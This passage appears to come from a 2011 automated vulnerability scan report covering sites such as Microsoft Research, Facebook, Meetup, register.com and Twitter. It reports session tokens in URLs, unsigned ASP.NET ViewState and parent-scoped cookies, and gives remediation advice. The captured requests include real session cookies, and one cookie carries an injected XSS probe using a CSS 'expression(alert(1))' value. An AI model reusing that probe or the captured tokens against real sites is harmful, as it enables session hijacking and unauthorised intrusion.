Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 03 Sep 2011 21:32:51 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

8.7. http://research.microsoft.com/en-us/about/awards.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/about/awards.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/about/awards.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 
02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:06:03 GMT
Content-Length: 149173

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- v:10.0.7.12 -->
   <head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
ing paper on the principles of distributed computing, the significance and impact of which on the theory and/or practice of distributed computing has been evident for at least a decade. Recognized for <A href="http://delivery.acm.org/10.1145/50000/42283/p288-dwork.pdf?key1=42283&amp;key2=7098097811&amp;coll=GUIDE&amp;dl=GUIDE&amp;CFID=25524953&amp;CFTOKEN=27642754" onClick="stc(this, 142)"><I>
...[SNIP]...

8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/people/ajbrush/default.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/people/ajbrush/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:27:08 GMT
Connection: close
Content-Length: 86504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- v:10.0.7.12 -->
   <head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<LI><A href="http://portal.acm.org/citation.cfm?id=1268551&amp;coll=portal&amp;dl=ACM&amp;CFID=26746030&amp;CFTOKEN=26792350" onClick="stc(this, 77)">A Digital Family Calendar in the Home: Lessons from Field Trials of LINC</A>
...[SNIP]...

8.9. http://research.microsoft.com/en-us/um/people/ymwang/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/um/people/ymwang/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/um/people/ymwang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 01 Aug 2011 17:09:19 GMT
Accept-Ranges: bytes
ETag: "a68445c06d50cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:06 GMT
Connection: close
Content-Length: 169997

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
</span> and rollback-recovery
and was a main co-author of the most influential <a
href="http://portal.acm.org/citation.cfm?id=568522.568525&amp;coll=portal&amp;dl=ACM&amp;CFID=4668864&amp;CFTOKEN=2689140#FullText" onClick="stc(this, 17)">
<span
style='color:black;mso-themecolor:text1'>
...[SNIP]...
<span style='font-size:
11.0pt;mso-bidi-font-size:12.0pt;font-family:"Arial","sans-serif"'><a
href="http://portal.acm.org/citation.cfm?id=568522.568525&amp;coll=portal&amp;dl=ACM&amp;CFID=4668864&amp;CFTOKEN=2689140#FullText" onClick="stc(this, 125)">
<span
style='color:#EAEAEA;text-decoration:none;text-underline:none'>
...[SNIP]...

8.10. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdba7b9bc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34dcad608%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28e4d4dc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e21e8cb4%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2948d778c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.64
X-Cnection: close
Date: Sat, 03 Sep 2011 13:11:37 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2e21e8cb4&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff357a4a1fc&relation=parent&transport=postmessage&frame=f34cdf2834", "http:\/\
...[SNIP]...

8.11. http://www.meetup.com/api/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.meetup.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /api/?method=storeStart&arg_uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&arg_process=ghrollout&arg_session=1535927&arg_page=ghome&arg_score=0&arg_variant=new&arg_memberId=0&arg_chapterId=1535927 HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:40 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app9.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 2
Connection: close

""

8.12. http://www.register.com/css/home-optimized.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /css/home-optimized.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /css/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:36 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/css/home-optimized.css
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/css/home-optimized.css"
...[SNIP]...

8.13. http://www.register.com/js/aop-attach.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/aop-attach.js
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/aop-attach.js">here<
...[SNIP]...

8.14. http://www.register.com/js/homepage-optimized.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/homepage-optimized.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:55 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/homepage-optimized.js
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/homepage-optimized.j
...[SNIP]...

8.15. http://www.register.com/js/jquery-1.3.2.min.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/jquery-1.3.2.min.js
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/jquery-1.3.2.min.js"
...[SNIP]...

9. ASP.NET ViewState without MAC enabled
There are 3 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. https://www.sslmatrix.com/Order/quickorder

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /Order/quickorder

Request

GET /Order/quickorder?pid=1&yr=5&ot=new&cc=smr09 HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:02 GMT
Content-Length: 59992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.2. https://www.sslmatrix.com/ssl-promotion-code

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /ssl-promotion-code

Request

GET /ssl-promotion-code HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:44:08 GMT
Content-Length: 37574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /ssl-promotion-code/ssl-price

Request

GET /ssl-promotion-code/ssl-price HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:06 GMT
Content-Length: 41273


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

10. Cookie scoped to parent domain
There are 77 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://api.twitter.com/1/statuses/media_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/media_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/media_timeline.json?offset=0&count=100&page=0&filter=false&include_entities=true&user_id=21457289 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055074-42775-36000
X-RateLimit-Limit: 1000
ETag: "1f9f43b2fa532e89f1e2cf41e94dd8ca"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:34 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01328
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: cabd62773ef621a8fa964ea84b4f0676e1d53b46
X-RateLimit-Reset: 1315058673
